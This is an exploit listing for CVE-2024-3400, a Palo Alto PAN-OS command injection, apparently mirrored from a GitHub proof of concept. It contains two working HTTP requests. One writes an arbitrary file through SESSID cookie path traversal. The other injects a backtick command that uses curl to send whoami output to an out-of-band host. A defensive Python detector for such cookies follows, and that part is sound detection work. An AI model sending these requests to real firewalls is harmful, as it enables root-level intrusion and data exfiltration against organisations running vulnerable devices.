- Palo Alto OS Command Injection[6]
- Authored by h4x0r-dz[7] | Site github.com[8]
Palo Alto OS was recently hit by a command injection zero-day attack. These are exploitation details related to the zero day.
- advisories | CVE-2024-3400[9]
- SHA-256 | d03a8781f559271cf9b0357b2f4175728dea72a07e8c80018aea6ad57dd5005c
# CVE-2024-3400
CVE-2024-3400 Palo Alto OS Command Injection
Send this HTTP request:
```http
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/96803de5-1d8c-42ec-b1fc-60e8e4a0a954)
This creates the file hellome1337.txt on the server with root access.
If you now request that file, you should receive a 403 instead of a 404.
![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/e579d4a6-11a5-4f7c-a3da-ba7b0cfa8a4d)
### Command Injection
```http
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.01
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
More info:
https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
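Both requests above differ from a normal GlobalProtect request only in what the SESSID cookie carries: a traversal path in the first, and a traversal path followed by shell command substitution in the second. The following Python is an added detection example, not part of the original proof of concept and not Palo Alto tooling. It parses raw HTTP request heads, extracts the SESSID cookie, and flags values containing traversal tokens or command-substitution syntax, which is what a reviewer of proxy captures or access logs would want to triage on. The sample requests, the host name, and the assumption that a legitimate SESSID is an opaque URL-safe token are all constructed for this example.

```python
import re

# Tokens that have no business inside an opaque session identifier.
TRAVERSAL = re.compile(r"\.\.[\\/]")            # "../" or "..\"
SHELL_META = re.compile(r"[`;|&]|\$\(|\$\{")     # backticks, $( ), ${ }, separators
# Assumption (not vendor-documented): a legitimate SESSID is an opaque
# token made only of URL-safe characters.
SESSID_ALLOWED = re.compile(r"[A-Za-z0-9_-]+")
# Applied to the raw Cookie header as well, so a ';' inside a value that
# splits the cookie during parsing cannot hide the rest of the payload.
RAW_SUSPICIOUS = re.compile(r"`|\$\(|\$\{|\.\.[\\/]")


def parse_request(raw: str) -> tuple[str, str, dict[str, str]]:
    """Split a raw HTTP/1.x request head into (method, path, lower-cased headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def parse_cookie_header(header: str) -> dict[str, str]:
    """Parse 'a=1; b=2' into a dict; values are kept verbatim (no decoding)."""
    cookies: dict[str, str] = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name:
            cookies[name.strip()] = value.strip()
    return cookies


def inspect_sessid(value: str) -> list[str]:
    """Return anomaly labels found in one SESSID value (empty list = clean)."""
    findings = []
    if TRAVERSAL.search(value):
        findings.append("path-traversal")
    if SHELL_META.search(value):
        findings.append("shell-metachar")
    if not SESSID_ALLOWED.fullmatch(value):
        findings.append("unexpected-charset")
    return findings


def scan_request(raw: str) -> list[str]:
    """Findings for one request; an empty list means nothing anomalous was seen."""
    method, path, headers = parse_request(raw)
    cookie_header = headers.get("cookie", "")
    findings = []
    sessid = parse_cookie_header(cookie_header).get("SESSID")
    if sessid is not None:
        findings.extend(inspect_sessid(sessid))
    if RAW_SUSPICIOUS.search(cookie_header):
        findings.append("raw-cookie-suspicious")
    # Context tag: the endpoint used in the requests shown on this page.
    if findings and method == "POST" and path.endswith("/ssl-vpn/hipreport.esp"):
        findings.append("hipreport-endpoint")
    return findings


# Constructed sample requests for the demo (not captured traffic).
BENIGN_REQUEST = (
    "POST /ssl-vpn/hipreport.esp HTTP/1.1\r\n"
    "Host: vpn.example.test\r\n"
    "Cookie: SESSID=8f1c2a9b7e6d; user=alice\r\n"
    "Connection: close\r\n"
    "Content-Length: 0\r\n\r\n"
)
TRAVERSAL_REQUEST = (
    "POST /ssl-vpn/hipreport.esp HTTP/1.1\r\n"
    "Host: vpn.example.test\r\n"
    "Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/probe.txt;\r\n"
    "Connection: close\r\n"
    "Content-Length: 0\r\n\r\n"
)
INJECTION_REQUEST = (
    "POST /ssl-vpn/hipreport.esp HTTP/1.1\r\n"
    "Host: vpn.example.test\r\n"
    "Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/x`id`;\r\n"
    "Connection: close\r\n"
    "Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST),
                       ("traversal", TRAVERSAL_REQUEST),
                       ("injection", INJECTION_REQUEST)):
        print(f"{label:10s} -> {scan_request(req) or 'clean'}")
```

The check is deliberately pattern-based rather than tied to one payload: the allowlist on the SESSID value catches encodings and paths the two regexes do not anticipate, and scanning the raw Cookie header as well as the parsed value closes the gap where a `;` inside the payload would otherwise truncate what the parser sees. Treat hits as triage leads to confirm against the device, not as proof of compromise on their own.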